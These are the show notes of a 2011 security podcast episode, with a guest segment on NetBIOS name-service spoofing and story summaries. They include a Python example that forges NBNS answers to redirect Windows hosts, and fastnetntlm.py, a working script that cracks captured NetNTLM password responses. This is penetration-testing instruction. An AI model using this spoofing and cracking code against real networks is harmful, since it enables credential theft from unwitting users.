Episode270

From Paul's Security Weekly
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security


Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 270 for Thursday December 15th, 2011.

  • Subscribe to our only non-computer-security-related show, dedicated to cigar enthusiasts: Stogie Geeks with Paul Asadoorian and Tim "BugBear" Mugherini. We are working on our top ten cigars released in 2011. We've been painstakingly smoking cigars, enjoyed with fresh coffee and single malt scotch in my nice warm workshop. It's a hard job but someone has to do it, and we're, ya know, toughing through it.

Episode Media

MP3

Guest Interview: Tim Medin

6:00 PM ET

Tim Medin is a senior security consultant for FishNet Security and specializes in penetration testing. He has held a variety of positions in technology fields including developer, network engineer, control systems engineer, robotic engineer, penetration tester, and McDonald's fry cook. He is active in the security community on the CommandLineKungFu.com podcast, Laudanum, his local defcon group, CCDC, and other areas.

Tim is on to discuss NBNS (NetBIOS Name Service) spoofing and automating the cracking of the NetNTLM challenge-response hashes captured from hosts that fall for it.
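The exchange Tim describes, as an added example that is not part of the show notes or of Tim's tool: the NBNS name query a Windows host broadcasts on UDP/137 for a name it cannot resolve, and the forged positive answer a spoofer sends back. A victim that accepts the answer connects to the spoofer's address and, for a file server name, authenticates over SMB, which is where the NetNTLM responses the script below cracks come from. The host name, transaction ID and addresses are made up, and is_spoofer_answer is a canary check of my own for the defensive side (query a name that does not exist; anything that answers is a spoofer). Python 3.

```python
import socket
import struct

# NetBIOS name suffixes (16th byte of the name), from RFC 1001/1002
NB_SUFFIX_WORKSTATION = 0x00
NB_SUFFIX_FILE_SERVER = 0x20

NBNS_PORT = 137
QTYPE_NB = 0x0020                   # NetBIOS general name service RR
QCLASS_IN = 0x0001
FLAGS_QUERY = 0x0110                # OPCODE=query, RD=1, B=1 (broadcast)
FLAGS_POSITIVE_RESPONSE = 0x8500    # R=1, AA=1, RD=1, RCODE=0


def encode_netbios_name(name, suffix=NB_SUFFIX_FILE_SERVER):
    """RFC 1001 first-level encoding: the 15-character space-padded name plus the
    suffix byte, each byte split into two nibbles written as letters from 'A'.
    Returns the wire label: length byte 0x20, 32 letters, zero terminator."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    letters = bytearray()
    for b in raw:
        letters.append(0x41 + (b >> 4))
        letters.append(0x41 + (b & 0x0F))
    return bytes([32]) + bytes(letters) + b"\x00"


def decode_netbios_name(pkt, offset):
    """Inverse of encode_netbios_name. Returns (name, suffix, offset_after_label)."""
    if pkt[offset] != 32:
        raise ValueError("unexpected NetBIOS label length %d" % pkt[offset])
    letters = pkt[offset + 1:offset + 33]
    raw = bytes(((letters[i] - 0x41) << 4) | (letters[i + 1] - 0x41) for i in range(0, 32, 2))
    if pkt[offset + 33] != 0:
        raise ValueError("NetBIOS label not terminated")
    return raw[:15].decode("ascii").rstrip(" "), raw[15], offset + 34


def build_query(trn_id, name, suffix=NB_SUFFIX_FILE_SERVER):
    """What a Windows host broadcasts when DNS fails to resolve a name."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_QUERY, 1, 0, 0, 0)
    return header + encode_netbios_name(name, suffix) + struct.pack("!HH", QTYPE_NB, QCLASS_IN)


def build_spoofed_response(trn_id, name, suffix, answer_ip, ttl=165):
    """The spoofer's reply: an authoritative positive answer mapping the name to
    answer_ip. trn_id must echo the query or the victim discards the answer."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr = encode_netbios_name(name, suffix) + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(answer_ip)   # NB_FLAGS: unique name, B-node
    return header + rr + rdata


def parse_packet(pkt):
    """Parse either direction into the transaction id, whether it is a response,
    the names it carries and any answered addresses."""
    trn_id, flags, qdcount, ancount, _nscount, _arcount = struct.unpack("!HHHHHH", pkt[:12])
    result = {"trn_id": trn_id, "response": bool(flags & 0x8000), "names": [], "addresses": []}
    offset = 12
    for _ in range(qdcount):
        name, suffix, offset = decode_netbios_name(pkt, offset)
        offset += 4                                  # QTYPE, QCLASS
        result["names"].append((name, suffix))
    for _ in range(ancount):
        name, suffix, offset = decode_netbios_name(pkt, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[offset:offset + 10])
        offset += 10
        rdata = pkt[offset:offset + rdlen]
        offset += rdlen
        result["names"].append((name, suffix))
        if rtype == QTYPE_NB:
            for i in range(0, rdlen, 6):             # each entry: 2-byte NB_FLAGS + 4-byte IP
                result["addresses"].append(socket.inet_ntoa(rdata[i + 2:i + 6]))
    return result


def is_spoofer_answer(probe_name, pkt):
    """Defensive canary (my own check, not from the interview): query a name that
    does not exist on the network; any positive answer for it comes from
    something answering every request."""
    parsed = parse_packet(pkt)
    return (parsed["response"]
            and any(n == probe_name.upper() for n, _ in parsed["names"])
            and len(parsed["addresses"]) > 0)


if __name__ == "__main__":
    # Constructed exchange: the victim asks for a mistyped file server name, the
    # spoofer answers with its own address. Name, id and addresses are made up.
    query = build_query(0x1234, "FILESRV01")
    reply = build_spoofed_response(0x1234, "FILESRV01", NB_SUFFIX_FILE_SERVER, "10.0.0.66")
    print("query  :", query.hex())
    print("reply  :", reply.hex())
    print("victim :", parse_packet(query))
    print("spoofer:", parse_packet(reply))
    print("canary flagged:", is_spoofer_answer("FILESRV01", reply))
```

The spoofer does not need to guess anything: the query is a broadcast carrying the transaction ID and the name in the clear, so it simply echoes both and substitutes its own address. That is also why the canary works on the defensive side; a legitimate host only answers for names it owns.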


Command Line Kung Fu Blog

Security Whole Blog

Tim on Twitter

fastnetntlm.py


#!/usr/bin/env python

####################################################################################
# Author:      Tim Medin
# Contact:     timmedin [@] securitywhole [d0t] com
# Name:        fastnetntlm.py
# Version:     0.1
# Description: An automated method of reading netntlm hashes and cracking them
#
# Input is the capture format written by Metasploit's SMB capture module, one
# response per line:
#     user::DOMAIN:lmresponse:ntresponse:challenge
# The first 8 bytes (16 hex characters) of an LMv1 response depend only on the
# first 7 characters of the password, so the halflmchall rainbow tables recover
# that prefix (the "seed"); John's netntlm.pl then brute-forces the remaining
# characters and, on a second pass, the case of the NTLM password.
####################################################################################

from __future__ import print_function
import os
import subprocess
from optparse import OptionParser
from optparse import OptionGroup
from datetime import datetime

usage = "usage: %prog [options] hashesfile"
parser = OptionParser(usage=usage, version="%prog 0.1")
parser.add_option("-a", "--alpha",      action="store", type="string", dest="rt_alpha",    help="path to halflmchall_alpha-numeric rainbow tables")
parser.add_option("-b", "--all",        action="store", type="string", dest="rt_allspace", help="path to halflmchall_all-space rainbow tables")
parser.add_option("-v", "--verbose",    action="store_true",           dest="verbose",     help="print status messages to stdout", default=False)

group = OptionGroup(parser, "Supplementary executable locations", "If your file locations differ from the default use these options")
group.add_option("-p", "--perlpath",    action="store", type="string", dest="perl",        help="path to perl (default is /usr/bin/perl)", default="/usr/bin/perl")
group.add_option("-j", "--johnnetntlm", action="store", type="string", dest="johnnetntlm", help="path to John the Ripper's netntlm.pl from Jumbo Pack (default is /usr/share/john/netntlm.pl)", default="/usr/share/john/netntlm.pl")
group.add_option("-r", "--rcracki",     action="store", type="string", dest="rcracki",     help="path to rcracki_mt (default is /usr/bin/rcracki_mt)", default="/usr/bin/rcracki_mt")
parser.add_option_group(group)

(options, args) = parser.parse_args()

# put the rainbow tables into a list; alpha-numeric first because it is the smaller, faster search
rtables = []
if options.rt_alpha:
    rtables.append(options.rt_alpha)
if options.rt_allspace:
    rtables.append(options.rt_allspace)
if len(rtables) == 0:
    parser.error("No rainbow tables specified")

# ensure an input file is specified and that every path we were given exists
if len(args) == 0:
    parser.error("No hashes file specified")
for path in [args[0], options.perl, options.johnnetntlm, options.rcracki] + rtables:
    if not os.path.exists(path):
        parser.error(path + " does not exist")

# rcracki_mt reads charset.txt from the current working directory
if not os.path.exists("charset.txt"):
    print("Warning: charset.txt not found in the current directory; copy it from the directory rcracki_mt runs in")


def run(cmd):
    """Run a command given as an argument list (no shell, so user/domain strings from
    the capture cannot inject into the command line) and return its stdout as text."""
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out = process.communicate()[0]
    return out.decode("utf-8", "replace")


def rcracki_seed(table, lmhash_first):
    """Look the first half of the LM response up in one table set. rcracki_mt prints
    the result on its last line as '<hash> <plaintext> hex:<...>', with the plaintext
    '<notfound>' on a miss."""
    lines = run([options.rcracki, "-h", lmhash_first, table]).splitlines()
    if not lines or len(lines[-1].split()) < 2:
        return "<notfound>"
    return lines[-1].split()[1]


def safe_name(s):
    """Keep only characters that cannot escape the working directory in a file name."""
    return "".join(c for c in s if c.isalnum() or c in "-_.")


# open hashes file and remove duplicates
hashes = set()
with open(args[0], "r") as fin:
    for hashrow in fin:
        hashrow = hashrow.strip()
        if hashrow and hashrow.count(":") >= 3:
            hashes.add(hashrow)

# crack away baby
for line in hashes:
    if options.verbose: print("Processing " + line)

    # parse the capture line: user::domain:lmresponse:ntresponse:challenge
    fields = line.split(":")
    user = fields[0]
    domain = fields[2]
    lmhash = fields[3]
    lmhash_first = lmhash[0:16]

    # try each table set in turn until one returns the 7-character seed
    seed = "<notfound>"
    for table in rtables:
        if options.verbose: print(str(datetime.now()) + ": Processing " + user + " with tables " + table)
        seed = rcracki_seed(table, lmhash_first)
        if options.verbose: print(str(datetime.now()) + ": Processing " + user + " seed: " + seed)
        if seed != "<notfound>":
            break

    if seed == "<notfound>":
        print(domain + " " + user + " <notfound>")
        continue

    # netntlm.pl works on a file holding only this response
    singlehashfile = safe_name(domain) + "." + safe_name(user) + ".hash"
    fout = open(singlehashfile, "w")
    fout.write(line + "\n")
    fout.close()

    if options.verbose: print(str(datetime.now()) + ": Bruteforcing the remainder of " + user + "'s password  " + seed)
    # netntlm.pl is run twice on purpose: the first pass completes the LM response
    # (the seed plus the characters after it), the second pass uses that result to
    # recover the case-sensitive NTLM password, which is what gets printed
    netntlm = [options.perl, options.johnnetntlm, "--seed", seed, "--file", singlehashfile]
    run(netntlm)
    out = run(netntlm)

    # check the output. the first part looks for a new crack, printed as "password (user)"
    passwd = None
    for outline in out.splitlines():
        if "(" + user + ")" in outline:
            passwd = outline.split()[0]

    # if the password was previously found john reports it from its pot file as "user:password"
    if not passwd:
        for outline in out.splitlines():
            if user in outline and ":" in outline:
                passwd = outline.split(":")[1]

    print(domain + " " + user + " " + (passwd or "<not cracked>"))
    os.remove(singlehashfile)

Paul's Stories

  1. Password Improvements Coming To Windows 8 - Why doesn't Windows have a good unified password storage that works with multiple browsers, applications, and services? Could this be the key to solving the password problem? Right now, users have to know to go download KeePass, and most people don't. Sure, if the password database is hacked, it's a bad thing; however, if an attacker is on your system they can get your passwords anyhow. I'm starting to think that this technology, if enabled by default and integrated into Windows, has the highest probability of making the largest impact on password security. Of course, it has to come with a filter to make sure users choose passwords of a minimum length. Then again, anyone who doesn't allow a user to enter at least a 12-character password should be shot without question.
  2. Reversing Industrial firmware for fun and backdoors I - I love to see articles on reverse engineering firmware; it makes me, well, excited. The part I LOVE about this post is that he searches Shodan to find these devices on the Internet, then downloads the firmware. So, you see, SCADA industry, you don't even need the device in order to find bugs and write exploit code or find backdoors in your systems. Turns out there are tons of backdoor accounts, and it turns out you can upload your own firmware. Same story we've been telling for years, nicely presented by Ruben Santamarta at the reversemode.com blog.
  3. Not 0wning That ColdFusion Server but Helping... - Useful tips on attacking ColdFusion web servers, which are still pretty popular.
  4. Splunk Remote Root Exploit - Ouch, but it looks like you still need to brute-force a password. The point is, though, make sure the free security tools you've installed inside your network do not contain vulnerabilities. If we all helped test the tools we used, the security world would be a safer place.
  5. A look back at 2011's security landscape - I got a look back at 2011: a bunch of shit got pwn3d, companies had data breaches coming out of the ass, and client-side and web application software is total crap. My prediction for 2012 along the same lines? We're all Phucked.
  6. Ettercap updated after more than seven years. - Nice to see tools that haven't been updated in a while get updated. Ettercap is still a fantastic tool for attacking; I've seen it used in some pretty advanced attacks. Glad to see that someone has taken the helm on the project.
  7. PuTTY Stored Plaintext Passwords in Memory After Authentication - We see this a lot, and I wish applications would not do this: stop storing plain-text passwords in memory! However, if you are pen testing, dumping memory is fun, you should do it. Even better if the password is stored in the registry either as plain text or easily decipherable.
  8. DARPA Shredder Challenge - I think this is really cool: Today's troops often confiscate the remnants of destroyed documents in war zones, but reconstructing them is a daunting task. DARPA's Shredder Challenge called upon computer scientists, puzzle enthusiasts and anyone else who likes solving complex problems to compete for up to $50,000 by piecing together a series of shredded documents. Yea, that's right bitches, if you leave stuff behind that's shredded, we will put it together and use it against you. My advice? Fire, lots of fire.
  9. Path of Least Resistance : FishNet Security - And, go Tim!
  10. VLAN Hacking | InfoSec Institute - IT Training and Information Security Resources - Nice tutorial on VLAN hopping. Nothing really new, but we should be testing this on all our internal pen tests to see how the network reacts if they are relying on VLANs to segment the network. The nice part about jumping around at layer 2 is that firewalls, for the most part, are still a layer 3 thing.
  11. Prepping for 2012: 3 Tips When Speaking to the Board of Directors - I like this article; any information and tips we get for talking to management should be taken seriously. Broken down, it's keeping it simple, using pictures and numbers, and repeating yourself in an interesting way. Love it.
  12. Top 5 mobile phone security threats in 2012 - Uhm, yea, these are the same threats we've dealt with for a long time. Go figure. I still stand by my stance on mobile phones: attackers will go after them only when it's more profitable and easier to attack mobile phones rather than Internet-connected computers.
  13. VPN An Oft-Forgotten Attack Vector - VPNs are targets; penetration tests expose them all the time. The thing is, it's a client-side attack. So, make sure you allow your testers to go after the VPN with the gloves off. Throwing them an IP address and saying "test my VPN" does not work.
  14. Microsoft gets silent upgrade religion - Microsoft will silently upgrade the browser? No way, won't this break stuff? I'm shocked MS customers aren't more pissed off. There are so many applications that break when the browser is updated. My advice: don't buy apps like this. However, how do you know? Sure, you could ask them if an update will break it, and of course they are going to say "no". I think the problem is slimy software companies. Be damned with them.

Larry's Stories

  1. Splunk with Spunk - [Larry] - A couple of vulnerabilities in Splunk that allow directory traversal, remote code execution, gathering of logs, user ID creation and brute force, all in one handy tool. Figures, guess what I just installed the other day… This is potentially damaging if you are using this for log management in your org, as this would be great for an attacker to gain access to and harvest for information, and wipe…
  2. All up in your GPS - [Larry] - That "recovered" US drone? Allegedly it was forced to land by overriding operator control with wireless jamming, forcing it into autopilot. Autopilot then said "return and land at these coordinates", which the Iranians claim to have spoofed to get it to land where they wanted. They say it was damaged as the real landing zone and the fake one did not have the same height above sea level, thus damaging the landing gear. I wonder why, if they could spoof the location (how did they know the location?), they could not spoof an accurate altitude.
  3. Metasploit updates and deaths - [Larry] - Moving forward, quite possibly, but making a whole lot of work for us going forward. The death of db_autopwn is upon us with new automation methods still in development (and maybe a bit light). Also the death of XMLRPC, which was allegedly very buggy. Some tools updated for it, but not all (Armitage OK I think, nsploit not yet, and who knows about all of your custom tools). Oh, and yes, my question about how to keep updating now that the project has moved to git? You should still do "svn update", as they wrote some custom software to pull from git and populate svn.
  4. Lazarus from the dead - [Larry] - An updated version of Ettercap. The first time in 7 years we have an update, with some bug fixes, and Alor & Naga have passed the development torch to a new team.
  5. When you see this… - [Larry] - Sounds like a pentest to me.
  6. I want Carlos to do this story because it is about PuTTY - [Larry] - whoops. Passwords stored in cleartext in memory buffers during program execution after successful authentication…

Jack's Lonely Story